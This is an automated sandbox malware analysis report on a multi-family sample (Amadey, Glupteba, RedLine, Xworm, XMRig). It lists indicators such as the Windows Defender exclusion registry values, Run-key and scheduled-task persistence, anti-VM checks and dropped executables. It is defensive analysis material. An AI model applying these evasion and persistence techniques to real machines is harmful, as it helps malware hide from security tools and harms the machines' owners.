Malware Analysis Report

2024-09-23 01:09

Sample ID 240514-bzzf5see25
Target 553d621ec1f218c7a070df8d1e086b74.bin
SHA256 8e2f3895472fb18244a2a6674ed16a805182ee2665e6e736ec6ef068e35f29d4
Tags
amadey glupteba redline stormkitty xmrig xworm 1 dropper evasion execution infostealer loader miner persistence rat stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8e2f3895472fb18244a2a6674ed16a805182ee2665e6e736ec6ef068e35f29d4

Threat Level: Known bad

The file 553d621ec1f218c7a070df8d1e086b74.bin was found to be: Known bad.

Malicious Activity Summary

amadey glupteba redline stormkitty xmrig xworm 1 dropper evasion execution infostealer loader miner persistence rat stealer themida trojan upx

xmrig

Contains code to disable Windows Defender

Windows security bypass

Glupteba payload

RedLine payload

Amadey

StormKitty payload

Detect Xworm Payload

StormKitty

Xworm

RedLine

Glupteba

Modifies boot configuration data using bcdedit

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Stops running service(s)

Creates new service(s)

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Themida packer

Checks BIOS information in registry

Identifies Wine through registry keys

Executes dropped EXE

UPX packed file

Loads dropped DLL

Windows security modification

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-14 01:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-14 01:35

Reported

2024-05-14 01:39

Platform

win7-20240508-en

Max time kernel

32s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe"

Signatures

Amadey

trojan amadey

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A

Xworm

trojan rat xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe N/A
N/A N/A C:\Windows\Temp\173859.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe N/A
N/A N/A C:\Windows\Temp\973247.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe N/A
N/A N/A C:\Windows\Temp\173859.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2956 set thread context of 2004 N/A C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\installc.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\installg.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\installm.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\installc.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\installg.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\installm.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
